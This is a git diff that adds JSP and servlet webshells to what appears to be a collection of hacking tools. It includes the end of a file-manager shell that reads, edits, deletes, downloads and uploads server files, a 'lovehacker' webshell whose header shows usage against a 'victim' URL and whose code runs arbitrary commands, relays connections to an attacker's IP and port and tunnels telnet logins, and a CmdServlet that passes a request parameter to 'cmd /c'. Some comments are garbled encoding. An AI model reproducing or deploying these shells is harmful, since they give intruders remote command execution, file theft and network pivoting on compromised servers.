getLine(is); // Skip blank line + line = getLine(is); // Position to boundary line + continue; + } + } + boolean skipBlankLine = true; + if (isFile) { + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else { + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) throw new IllegalArgumentException( + "Bad data in third line"); + stLine.nextToken(); // Content-Type + fileInfo.fileContentType = stLine.nextToken(); + } + } + if (skipBlankLine) { + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile) { + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + // If parameter is dir, change saveInDir to dir + if (paramName.equals("dir")) saveInDir = line; + line = getLine(is); + continue; + } + try { + UplInfo uplInfo = new UplInfo(clength); + UploadMonitor.set(fileInfo.clientFileName, uplInfo); + OutputStream os = null; + String path = null; + if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent) { + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + uplInfo.aborted = true; + break; + } + if (compareBoundary(boundary, currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + private boolean compareBoundary(String boundary, byte ba[]) { + byte b; + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } +} +String formatPath(String p) +{ + StringBuffer sb=new StringBuffer(); + for (int i = 0; i < p.length(); i++) + { + if(p.charAt(i)=='\\') + { + sb.append("\\\\"); + } + else + { + sb.append(p.charAt(i)); + } + } + return sb.toString(); +} + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + static String htmlEncode(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } +String getDrivers() +{ + StringBuffer sb=new StringBuffer(strDrivers[languageNo] + " : "); + File roots[]=File.listRoots(); + for(int i=0;i"); + sb.append(roots[i]+" "); + } + return sb.toString(); +} +static String convertFileSize(long filesize) +{ + String strUnit="Bytes"; + String strAfterComma=""; + int intDivisor=1; + if(filesize>=1024*1024) + { + strUnit = "MB"; + intDivisor=1024*1024; + } + else if(filesize>=1024) + { + strUnit = "KB"; + intDivisor=1024; + } + if(intDivisor==1) return filesize + " " + strUnit; + strAfterComma = "" + 100 * (filesize % intDivisor) / intDivisor ; + if(strAfterComma=="") strAfterComma=".0"; + return filesize / intDivisor + "." + strAfterComma + " " + strUnit; +} +%> +<% +request.setCharacterEncoding("gb2312"); +String tabID = request.getParameter("tabID"); +String strDir = request.getParameter("path"); +String strAction = request.getParameter("action"); +String strFile = request.getParameter("file"); +String strPath = strDir + "\\" + strFile; +String strCmd = request.getParameter("cmd"); +StringBuffer sbEdit=new StringBuffer(""); +StringBuffer sbDown=new StringBuffer(""); +StringBuffer sbCopy=new StringBuffer(""); +StringBuffer sbSaveCopy=new StringBuffer(""); +StringBuffer sbNewFile=new StringBuffer(""); +if((tabID==null) || tabID.equals("")) +{ + tabID = "1"; +} +if(strDir==null||strDir.length()<1) +{ + strDir = request.getRealPath("/"); +} +if(strAction!=null && strAction.equals("down")) +{ + File f=new File(strPath); + if(f.length()==0) + { + sbDown.append("ļСΪ 0 ֽڣͲ˰"); + } + else + { + response.setHeader("content-type","text/html; charset=ISO-8859-1"); + response.setContentType("APPLICATION/OCTET-STREAM"); + response.setHeader("Content-Disposition","attachment; filename=\""+f.getName()+"\""); + FileInputStream fileInputStream =new FileInputStream(f.getAbsolutePath()); + out.clearBuffer(); + int i; + while ((i=fileInputStream.read()) != -1) + { + out.write(i); + } + fileInputStream.close(); + out.close(); + } +} +if(strAction!=null && strAction.equals("del")) +{ + File f=new File(strPath); + f.delete(); +} +if(strAction!=null && strAction.equals("edit")) +{ + File f=new File(strPath); + BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(f))); + sbEdit.append("
    \r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append("\r\n"); + sbEdit.append(" "); + sbEdit.append("  "+strPath+"\r\n"); + sbEdit.append("
    "); + sbEdit.append(""); + sbEdit.append("
    "); +} +if(strAction!=null && strAction.equals("save")) +{ + File f=new File(strPath); + BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f))); + String strContent=request.getParameter("content"); + bw.write(strContent); + bw.close(); +} +if(strAction!=null && strAction.equals("copy")) +{ + File f=new File(strPath); + sbCopy.append("
    \r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("\r\n"); + sbCopy.append("ԭʼļ "+strPath+"

    "); + sbCopy.append("Ŀļ

    "); + sbCopy.append(" "); + sbCopy.append("

     \r\n"); + sbCopy.append("

    "); +} +if(strAction!=null && strAction.equals("savecopy")) +{ + File f=new File(strPath); + String strDesFile=request.getParameter("file2"); + if(strDesFile==null || strDesFile.equals("")) + { + sbSaveCopy.append("

    Ŀļ"); + } + else + { + File f_des=new File(strDesFile); + if(f_des.isFile()) + { + sbSaveCopy.append("

    ĿļѴ,ܸơ"); + } + else + { + String strTmpFile=strDesFile; + if(f_des.isDirectory()) + { + if(!strDesFile.endsWith("\\")) + { + strDesFile=strDesFile+"\\"; + } + strTmpFile=strDesFile+"cqq_"+strFile; + } + File f_des_copy=new File(strTmpFile); + FileInputStream in1=new FileInputStream(f); + FileOutputStream out1=new FileOutputStream(f_des_copy); + byte[] buffer=new byte[1024]; + int c; + while((c=in1.read(buffer))!=-1) + { + out1.write(buffer,0,c); + } + in1.close(); + out1.close(); + sbSaveCopy.append("ԭʼļ "+strPath+"

    "); + sbSaveCopy.append("Ŀļ "+strTmpFile+"

    "); + sbSaveCopy.append("Ƴɹ"); + } + } + sbSaveCopy.append("

    "); +} +if(strAction!=null && strAction.equals("newFile")) +{ + String strF=request.getParameter("fileName"); + String strType1=request.getParameter("btnNewFile"); + String strType2=request.getParameter("btnNewDir"); + String strType=""; + if(strType1==null) + { + strType="Dir"; + } + else if(strType2==null) + { + strType="File"; + } + if(!strType.equals("") && !(strF==null || strF.equals(""))) + { + File f_new=new File(strF); + if(strType.equals("File") && !f_new.createNewFile()) + sbNewFile.append(strF+" ļʧ"); + if(strType.equals("Dir") && !f_new.mkdirs()) + sbNewFile.append(strF+" Ŀ¼ʧ"); + } + else + { + sbNewFile.append("

    ļĿ¼ʧ"); + } +} +if((request.getContentType()!= null) && (request.getContentType().toLowerCase().startsWith("multipart"))) +{ + String tempdir="."; + boolean error=false; + response.setContentType("text/html"); + sbNewFile.append("

    ļĿ¼ʧ"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser.processData(request.getInputStream(), bound, tempdir, clength); + if (ht.get("cqqUploadFile") != null) + { + FileInfo fi = (FileInfo) ht.get("cqqUploadFile"); + File f1 = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) + { + f1.delete(); + request.setAttribute("error", "Upload aborted"); + } + else + { + String path = (String) ht.get("path"); + if(path!=null && !path.endsWith("\\")) + path = path + "\\"; + if (!f1.renameTo(new File(path + f1.getName()))) + { + request.setAttribute("error", "Cannot upload file."); + error = true; + f1.delete(); + } + } + } +} +%> + + + + +::Silic Group:: + + +

    + + + + + + +
    + + + +<% +StringBuffer sbFolder=new StringBuffer(""); +StringBuffer sbFile=new StringBuffer(""); +try +{ + File objFile = new File(strDir); + File list[] = objFile.listFiles(); + if(objFile.getAbsolutePath().length()>3) + { + sbFolder.append(" "); + sbFolder.append(strParentFolder[languageNo]+"
    - - - - - - - - - - - \r\n "); + } + for(int i=0;i "); + sbFolder.append(" "); + sbFolder.append(list[i].getName()+"
    "); + } + else + { + String strLen=""; + String strDT=""; + long lFile=0; + lFile=list[i].length(); + strLen = convertFileSize(lFile); + Date dt=new Date(list[i].lastModified()); + strDT=dt.toLocaleString(); + sbFile.append(""); + sbFile.append(""+list[i].getName()); + sbFile.append(""); + sbFile.append(""+strLen); + sbFile.append(""); + sbFile.append(""+strDT); + sbFile.append(""); + sbFile.append("  "); + sbFile.append(strFileEdit[languageNo]+" "); + sbFile.append("  "); + sbFile.append(strFileDel[languageNo]+" "); + sbFile.append("  "); + sbFile.append(strFileDown[languageNo]+" "); + sbFile.append("  "); + sbFile.append(strFileCopy[languageNo]+" "); + } + + } +} +catch(Exception e) +{ + out.println("ʧܣ "+e.toString()+""); +} +%> +
    + + + + +
    +
    All Rights Reserved, blackbap.org © Silic Group Inc.
    diff --git a/jsp/hackk8/fuck-jsp/spjspshell.jsp b/jsp/hackk8/fuck-jsp/spjspshell.jsp new file mode 100644 index 0000000..b36557a --- /dev/null +++ b/jsp/hackk8/fuck-jsp/spjspshell.jsp @@ -0,0 +1,814 @@ +<% +/* +* WEBSHELL.JSP +* +* Author: lovehacker +* E-mail: wangyun188@hotmail.com +* +* ʹ÷: +* ]http://victim/webshell.jsp?[options] +* options: +* action=piped&remoteHost=&remotePort=&myIp=&myPort= +* action=tunnel&remoteHost=&remotePort=&myPort= +* action=login&username=&password=&myPort= +* action=send&myShell=&myPort=&cmd= +* action=close&myPort= +* action=shell&cmd= +* ӣ +* action=piped&remoteHost=192.168.0.1&remotePort=25&myIp=218.0.0.1&myPort=12345 -- 192.168.0.125˿218.0.0.112345˿NC12345˿ڣ޷ֱӷѿƵWEBijij˿ڣǽδ˸WEBӡ +* action=tunnel&remoteHost=192.168.0.1&remotePort=23&myPort=65534 -- ʵͨʸwebshell.jspijtelnetĹܡԭʵͨwebshell.jspʵֶʵĹܣjspʵΪӣƵĻֻ80˿ڣҷǽInternetַdzijTelnet:-) +* action=login&username=root&password=helloroot&myPort=65534 -- һֻǸҪTelnet̨һſʼ½ҪҪtelnetȷûรҪȻ˭Ҳû취 +* action=send&myShell=&myPort=&cmd= -- һ˳ɣôͿϱִִеˡmyShellǽǣ޷֪ʲôʱýһҪдรٺ٣鷳ޣcmdҪִеˣ磺which ssh棺myShell=lovehacker&cmd=ls -la;echo lovehacker +* action=close&myPort= -- ˳telnet½ϿŵĶ˿ڻûرգҪִֳɨɾ +* action=shell&cmd= -- Ƶִ̨Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\winnt\system32\cmd.exe /c type c:\winnt\win.ini +* ˵ +* ͨjspʵtelnetʱʵͷʹһѣÿһµ̣߳client socketȥ +* telnetֻ޷ʵûĽ˸취telnetĹ̷ֲɣ +* յtunneḷ߳һ˿ڵȴӣһȺԶ̷ö˿Ӳһ +* ֱϿserver socketһһεݣһδεתԶ̷ͿԼ¼״̬ʵ +* ֺûĽˣܾ취̫JSPʵtelnetܣиõİ취Ļһ +* ҪŸҡ +* Ȩ˵ +* ʵTelnetĹҲ˼ҴĻ޸ĵģԣȨûУ޸ġơ +* ֻǼ¹ܱMailһݸร +* +* +*/ +%> +<%@ page import="java.io.*" %> +<%@ page import="java.net.*" %> +<%@ page import="java.util.*" %> +<%@ page import="java.awt.Dimension" %> +<% +class redirector implements Runnable +{ +private redirector companion = null; +private Socket localSocket, remoteSocket; +private InputStream from; +private OutputStream to; +private byte[] buffer = new byte[4096]; + +public redirector(Socket local, Socket remote) +{ +try { +localSocket = local; +remoteSocket = remote; +from = localSocket.getInputStream(); +to = remoteSocket.getOutputStream(); +} catch(Exception e) {} +} + +public void couple(redirector c) { +companion = c; +Thread listen = new Thread(this); +listen.start(); +} + +public void decouple() { companion = null; } + +public void run() +{ +int count; +try { +while(companion != null) { +if((count = from.read(buffer)) < 0) +break; +to.write(buffer, 0, count); +} +} catch(Exception e) {} +try { +from.close(); +to.close(); +localSocket.close(); +remoteSocket.close(); +if(companion != null) companion.decouple(); +} catch(Exception io) {} +} +} + +class redirector1 implements Runnable +{ +private redirector1 companion = null; +private Socket localSocket, remoteSocket; +private InputStream from; +private OutputStream to; +private byte[] buffer = new byte[4096]; + +public redirector1(Socket local, Socket remote) +{ +try { +localSocket = local; +remoteSocket = remote; +from = localSocket.getInputStream(); +to = remoteSocket.getOutputStream(); +} catch(Exception e) {} +} + +public void couple(redirector1 c) { +companion = c; +Thread listen = new Thread(this); +listen.start(); +} + +public void decouple() { companion = null; } + +public void run() +{ +String tmp = ""; +int count; +try { +while(companion != null) { +if((count = from.read(buffer)) < 0) break; +tmp = new String(buffer); +if(tmp.startsWith("--GoodBye--")) +{ +from.close(); +to.close(); +remoteSocket.close(); +localSocket.close(); +System.exit(1); +} +to.write(buffer, 0, count); +} +} catch(Exception e) {} +try { +if(companion != null) companion.decouple(); +} catch(Exception io) {} +} +} + +class piped implements Runnable +{ +String remoteHost1,remoteHost2; +int remotePort1, remotePort2; + +Thread listener, connection; + + +public piped(String raddr1,int rport1, String raddr2, int rport2) +{ +remoteHost1 = raddr1; remotePort1 = rport1; +remoteHost2 = raddr2; remotePort2 = rport2; +listener = new Thread(this); +listener.setPriority(Thread.MIN_PRIORITY); +listener.start(); +} + +public void run() +{ +Socket destinationSocket1 = null; +Socket destinationSocket2 = null; +try { +destinationSocket1 = new Socket(remoteHost1,remotePort1); +destinationSocket2 = new Socket(remoteHost2, remotePort2); +redirector r1 = new redirector(destinationSocket1, destinationSocket2); +redirector r2 = new redirector(destinationSocket2, destinationSocket1); +r1.couple(r2); +r2.couple(r1); +} catch(Exception e) { +try { +DataOutputStream os = new DataOutputStream(destinationSocket2.getOutputStream()); +os.writeChars("Remote host refused connection.\n"); +destinationSocket2.close(); +} catch(IOException ioe) { } +} +} +} + +class tunnel implements Runnable +{ +String remoteHost; +int localPort, remotePort; + +Thread listener, connection; + +ServerSocket server; + +public tunnel(int lport, String raddr, int rport) +{ +localPort = lport; +remoteHost = raddr; remotePort = rport; + +try { +server = new ServerSocket(localPort); +} catch(Exception e) {} + +listener = new Thread(this); +listener.setPriority(Thread.MIN_PRIORITY); +listener.start(); +} + +public void run() +{ +Socket destinationSocket = null; +try{ +destinationSocket = new Socket(remoteHost, remotePort); +}catch(Exception e){} +while(true) +{ +Socket localSocket = null; +try { +localSocket = server.accept(); +} catch(Exception e) { +continue; +} +try { +redirector1 r1 = new redirector1(localSocket, destinationSocket); +redirector1 r2 = new redirector1(destinationSocket, localSocket); +r1.couple(r2); +r2.couple(r1); +} catch(Exception e) { +try { +DataOutputStream os = new DataOutputStream(localSocket.getOutputStream()); +os.writeChars("Remote host refused connection.\n"); +localSocket.close(); +} catch(IOException ioe) {} +continue; +} +} +} +} + +class TelnetIO +{ +public String toString() { return "$Id: TelnetIO.java,v 1.10 1998/02/09 10:22:18 leo Exp $"; } + +private int debug = 0; + +private byte neg_state = 0; + +private final static byte STATE_DATA = 0; +private final static byte STATE_IAC = 1; +private final static byte STATE_IACSB = 2; +private final static byte STATE_IACWILL = 3; +private final static byte STATE_IACDO = 4; +private final static byte STATE_IACWONT = 5; +private final static byte STATE_IACDONT = 6; +private final static byte STATE_IACSBIAC = 7; +private final static byte STATE_IACSBDATA = 8; +private final static byte STATE_IACSBDATAIAC = 9; + +private byte current_sb; + +private final static byte IAC = (byte)255; + +private final static byte EOR = (byte)239; + +private final static byte WILL = (byte)251; + +private final static byte WONT = (byte)252; + +private final static byte DO = (byte)253; + +private final static byte DONT = (byte)254; + +private final static byte SB = (byte)250; + +private final static byte SE = (byte)240; + +private final static byte TELOPT_ECHO = (byte)1; /* echo on/off */ + +private final static byte TELOPT_EOR = (byte)25; /* end of record */ + +private final static byte TELOPT_NAWS = (byte)31; /* NA-WindowSize*/ + +private final static byte TELOPT_TTYPE = (byte)24; /* terminal type */ + +private final byte[] IACWILL = { IAC, WILL }; +private final byte[] IACWONT = { IAC, WONT }; +private final byte[] IACDO = { IAC, DO }; +private final byte[] IACDONT = { IAC, DONT }; +private final byte[] IACSB = { IAC, SB }; +private final byte[] IACSE = { IAC, SE }; + +private final byte TELQUAL_IS = (byte)0; + +private final byte TELQUAL_SEND = (byte)1; + +private byte[] receivedDX; + +private byte[] receivedWX; + +private byte[] sentDX; + +private byte[] sentWX; + +private Socket socket; +private BufferedInputStream is; +private BufferedOutputStream os; + +//private StatusPeer peer = this; /* peer, notified on status */ + +public void connect(String address, int port) throws IOException { +if(debug > 0) System.out.println("Telnet.connect("+address+","+port+")"); +socket = new Socket(address, port); +is = new BufferedInputStream(socket.getInputStream()); +os = new BufferedOutputStream(socket.getOutputStream()); +neg_state = 0; +receivedDX = new byte[256]; +sentDX = new byte[256]; +receivedWX = new byte[256]; +sentWX = new byte[256]; +} + +public void disconnect() throws IOException { +if(debug > 0) System.out.println("TelnetIO.disconnect()"); +if(socket !=null) socket.close(); +} + +public void connect(String address) throws IOException { +connect(address, 23); +} + +//public void setPeer(StatusPeer obj) { peer = obj; } + +public int available() throws IOException +{ +return is.available(); +} + +public byte[] receive() throws IOException { +int count = is.available(); +byte buf[] = new byte[count]; +count = is.read(buf); +if(count < 0) throw new IOException("Connection closed."); +if(debug > 1) System.out.println("TelnetIO.receive(): read bytes: "+count); +buf = negotiate(buf, count); +return buf; +} + +public void send(byte[] buf) throws IOException { +if(debug > 1) System.out.println("TelnetIO.send("+buf+")"); +os.write(buf); +os.flush(); +} + +public void send(byte b) throws IOException { +if(debug > 1) System.out.println("TelnetIO.send("+b+")"); +os.write(b); +os.flush(); +} + +private void handle_sb(byte type, byte[] sbdata, int sbcount) +throws IOException +{ +if(debug > 1) +System.out.println("TelnetIO.handle_sb("+type+")"); +switch (type) { +case TELOPT_TTYPE: +if (sbcount>0 && sbdata[0]==TELQUAL_SEND) { +String ttype; +send(IACSB);send(TELOPT_TTYPE);send(TELQUAL_IS); +/* FIXME: need more logic here if we use +* more than one terminal type +*/ +Vector vec = new Vector(2); +vec.addElement("TTYPE"); +ttype = (String)notifyStatus(vec); +if(ttype == null) ttype = "dumb"; +byte[] bttype = new byte[ttype.length()]; + +ttype.getBytes(0,ttype.length(), bttype, 0); +send(bttype); +send(IACSE); +} + +} +} + +public Object notifyStatus(Vector status) { +if(debug > 0) +System.out.println("TelnetIO.notifyStatus("+status+")"); +return null; +} + +private byte[] negotiate(byte buf[], int count) throws IOException { +if(debug > 1) +System.out.println("TelnetIO.negotiate("+buf+","+count+")"); +byte nbuf[] = new byte[count]; +byte sbbuf[] = new byte[count]; +byte sendbuf[] = new byte[3]; +byte b,reply; +int sbcount = 0; +int boffset = 0, noffset = 0; +Vector vec = new Vector(2); + +while(boffset < count) { +b=buf[boffset++]; + +if (b>=128) +b=(byte)((int)b-256); +switch (neg_state) { +case STATE_DATA: +if (b==IAC) { +neg_state = STATE_IAC; +} else { +nbuf[noffset++]=b; +} +break; +case STATE_IAC: +switch (b) { +case IAC: +if(debug > 2) +System.out.print("IAC "); +neg_state = STATE_DATA; +nbuf[noffset++]=IAC; +break; +case WILL: +if(debug > 2) +System.out.print("WILL "); +neg_state = STATE_IACWILL; +break; +case WONT: +if(debug > 2) +System.out.print("WONT "); +neg_state = STATE_IACWONT; +break; +case DONT: +if(debug > 2) +System.out.print("DONT "); +neg_state = STATE_IACDONT; +break; +case DO: +if(debug > 2) +System.out.print("DO "); +neg_state = STATE_IACDO; +break; +case EOR: +if(debug > 2) +System.out.print("EOR "); +neg_state = STATE_DATA; +break; +case SB: +if(debug > 2) +System.out.print("SB "); +neg_state = STATE_IACSB; +sbcount = 0; +break; +default: +if(debug > 2) +System.out.print( +" " +); +neg_state = STATE_DATA; +break; +} +break; +case STATE_IACWILL: +switch(b) { +case TELOPT_ECHO: +if(debug > 2) +System.out.println("ECHO"); +reply = DO; +vec = new Vector(2); +vec.addElement("NOLOCALECHO"); +notifyStatus(vec); +break; +case TELOPT_EOR: +if(debug > 2) +System.out.println("EOR"); +reply = DO; +break; +default: +if(debug > 2) +System.out.println( +"" +); +reply = DONT; +break; +} +if(debug > 1) +System.out.println("<"+b+", WILL ="+WILL+">"); +if ( reply != sentDX[b+128] || +WILL != receivedWX[b+128] +) { +sendbuf[0]=IAC; +sendbuf[1]=reply; +sendbuf[2]=b; +send(sendbuf); +sentDX[b+128] = reply; +receivedWX[b+128] = WILL; +} +neg_state = STATE_DATA; +break; +case STATE_IACWONT: +switch(b) { +case TELOPT_ECHO: +if(debug > 2) +System.out.println("ECHO"); + +vec = new Vector(2); +vec.addElement("LOCALECHO"); +notifyStatus(vec); +reply = DONT; +break; +case TELOPT_EOR: +if(debug > 2) +System.out.println("EOR"); +reply = DONT; +break; +default: +if(debug > 2) +System.out.println( +"" +); +reply = DONT; +break; +} +if ( reply != sentDX[b+128] || +WONT != receivedWX[b+128] +) { +sendbuf[0]=IAC; +sendbuf[1]=reply; +sendbuf[2]=b; +send(sendbuf); +sentDX[b+128] = reply; +receivedWX[b+128] = WILL; +} +neg_state = STATE_DATA; +break; +case STATE_IACDO: +switch (b) { +case TELOPT_ECHO: +if(debug > 2) +System.out.println("ECHO"); +reply = WILL; +vec = new Vector(2); +vec.addElement("LOCALECHO"); +notifyStatus(vec); +break; +case TELOPT_TTYPE: +if(debug > 2) +System.out.println("TTYPE"); +reply = WILL; +break; +case TELOPT_NAWS: +if(debug > 2) +System.out.println("NAWS"); +vec = new Vector(2); +vec.addElement("NAWS"); +Dimension size = (Dimension) +notifyStatus(vec); +receivedDX[b] = DO; +if(size == null) +{ +/* this shouldn't happen */ +send(IAC); +send(WONT); +send(TELOPT_NAWS); +reply = WONT; +sentWX[b] = WONT; +break; +} +reply = WILL; +sentWX[b] = WILL; +sendbuf[0]=IAC; +sendbuf[1]=WILL; +sendbuf[2]=TELOPT_NAWS; +send(sendbuf); +send(IAC);send(SB);send(TELOPT_NAWS); +send((byte) (size.width >> 8)); +send((byte) (size.width & 0xff)); +send((byte) (size.height >> 8)); +send((byte) (size.height & 0xff)); +send(IAC);send(SE); +break; +default: +if(debug > 2) +System.out.println( +"" +); +reply = WONT; +break; +} +if ( reply != sentWX[128+b] || +DO != receivedDX[128+b] +) { +sendbuf[0]=IAC; +sendbuf[1]=reply; +sendbuf[2]=b; +send(sendbuf); +sentWX[b+128] = reply; +receivedDX[b+128] = DO; +} +neg_state = STATE_DATA; +break; +case STATE_IACDONT: +switch (b) { +case TELOPT_ECHO: +if(debug > 2) +System.out.println("ECHO"); +reply = WONT; +vec = new Vector(2); +vec.addElement("NOLOCALECHO"); +notifyStatus(vec); +break; +case TELOPT_NAWS: +if(debug > 2) +System.out.println("NAWS"); +reply = WONT; +break; +default: +if(debug > 2) +System.out.println( +"" +); +reply = WONT; +break; +} +if ( reply != sentWX[b+128] || +DONT != receivedDX[b+128] +) { +send(IAC);send(reply);send(b); +sentWX[b+128] = reply; +receivedDX[b+128] = DONT; +} +neg_state = STATE_DATA; +break; +case STATE_IACSBIAC: +if(debug > 2) System.out.println(""+b+" "); +if (b == IAC) { +sbcount = 0; +current_sb = b; +neg_state = STATE_IACSBDATA; +} else { +System.out.println("(bad) "+b+" "); +neg_state = STATE_DATA; +} +break; +case STATE_IACSB: +if(debug > 2) System.out.println(""+b+" "); +switch (b) { +case IAC: +neg_state = STATE_IACSBIAC; +break; +default: +current_sb = b; +sbcount = 0; +neg_state = STATE_IACSBDATA; +break; +} +break; +case STATE_IACSBDATA: +if (debug > 2) System.out.println(""+b+" "); +switch (b) { +case IAC: +neg_state = STATE_IACSBDATAIAC; +break; +default: +sbbuf[sbcount++] = b; +break; +} +break; +case STATE_IACSBDATAIAC: +if (debug > 2) System.out.println(""+b+" "); +switch (b) { +case IAC: +neg_state = STATE_IACSBDATA; +sbbuf[sbcount++] = IAC; +break; +case SE: +handle_sb(current_sb,sbbuf,sbcount); +current_sb = 0; +neg_state = STATE_DATA; +break; +case SB: +handle_sb(current_sb,sbbuf,sbcount); +neg_state = STATE_IACSB; +break; +default: +neg_state = STATE_DATA; +break; +} +break; +default: +if (debug > 2) +System.out.println( +"This should not happen: "+ +neg_state+" " +); +neg_state = STATE_DATA; +break; +} +} +buf = new byte[noffset]; +System.arraycopy(nbuf, 0, buf, 0, noffset); +return buf; +} +} + +class TelnetConnect +{ +TelnetIO tio = new TelnetIO(); +int port = 0; +public TelnetConnect(int port) +{ +this.port = port; +} + +public void connect() +{ +try { +tio.connect("localhost",port); +} catch(IOException e) {} +} + +public void disconnect() +{ +try{ +tio.disconnect(); +}catch(IOException e){} +} + +private String wait(String prompt) +{ +String tmp = ""; +do { +try { +tmp += new String(tio.receive(), 0); +}catch(IOException e) {} +} while(tmp.indexOf(prompt) == -1); +return tmp; +} + +private byte[] receive() +{ +byte[] temp = null; +try{ +temp = tio.receive(); +}catch(IOException e){} +return temp; +} + +private String waitshell() +{ +String tmp = ""; +do { +try { tmp += new String(tio.receive(), 0); } +catch(IOException e) {} +} while((tmp.indexOf("$") == -1)&&(tmp.indexOf("#") == -1)&&(tmp.indexOf("%") == -1)); +return tmp; +} + +private void send(String str) +{ +byte[] buf = new byte[str.length()]; +str.getBytes(0, str.length(), buf, 0); +try { tio.send(buf); } catch(IOException e) {} +} +} +%> +<% +String action = request.getParameter("action"); +String cmd = request.getParameter("cmd"); +String remoteHost = request.getParameter("remoteHost"); +String myIp = request.getParameter("myIp"); +String myPort = request.getParameter("myPort"); +String remotePort = request.getParameter("remotePort"); +String username = request.getParameter("username"); +String password = request.getParameter("password"); +String myShell = request.getParameter("myShell"); +if(action.equals("shell")){ +try { +Process child = Runtime.getRuntime().exec(cmd); +InputStream in = child.getInputStream(); +int c; +while ((c = in.read()) != -1) { out.print((char)c); } +in.close(); +try { child.waitFor();} catch (InterruptedException e) {} +} catch (IOException e) {} +}else if(action.equals("piped")){ +piped me = new piped(remoteHost,Integer.parseInt(remotePort),myIp,Integer.parseInt(myPort)); +}else if(action.equals("tunnel")){ +tunnel me = new tunnel(Integer.parseInt(myPort), +remoteHost, Integer.parseInt(remotePort)); +}else if(action.equals("login")){ +TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort)); +tc.connect(); +out.print(tc.wait("login:")); +tc.send(username+"\r"); +out.print(tc.wait("Password:")); +tc.send(password+"\r"); +out.print(tc.waitshell()); +tc.disconnect(); +}else if(action.equals("send")){ +TelnetConnect tc = new TelnetConnect(Integer.parseInt(myPort)); +tc.connect(); +tc.send(cmd+"\r"); +if(!myShell.equals("logout")) +out.print(tc.wait(myShell)); +tc.disconnect(); +}else if(action.equals("close")){ +try{ +Socket s = new Socket("127.0.0.1",Integer.parseInt(myPort)); +DataOutputStream dos = new DataOutputStream(s.getOutputStream()); +PrintStream ps = new PrintStream(dos); +ps.println("--GoodBye--"); +ps.close(); +dos.close(); +s.close(); +}catch(Exception e){} +}else{ +out.print("You Love Hacker Too?"); +} +%> diff --git a/jsp/hackk8/jsp_77/CmdServlet.class b/jsp/hackk8/jsp_77/CmdServlet.class new file mode 100644 index 0000000..4afd7f1 Binary files /dev/null and b/jsp/hackk8/jsp_77/CmdServlet.class differ diff --git a/jsp/hackk8/jsp_77/CmdServlet.java b/jsp/hackk8/jsp_77/CmdServlet.java new file mode 100644 index 0000000..f9cb31a --- /dev/null +++ b/jsp/hackk8/jsp_77/CmdServlet.java @@ -0,0 +1,43 @@ +/* + * CmdServlet.java 20/01/2004 + * + * @author The Dark Raver + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.*; +import javax.servlet.http.*; + + +public class CmdServlet extends HttpServlet { + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + res.setContentType("text/html"); + + PrintWriter out = res.getWriter(); + out.print(""); + out.print("

    "); + out.print(""); + out.print(""); + out.print("
    "); + + if(req.getParameter("cmd") != null) { + out.print("\n

    Command: " + req.getParameter("cmd") + "\n

    \n");
+	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
+	        DataInputStream procIn = new DataInputStream(p.getInputStream());
+			int c='\0';
+        	while ((c=procIn.read()) != -1) {
+				out.print((char)c);
+				}
+	        }
+
+		out.print("\n
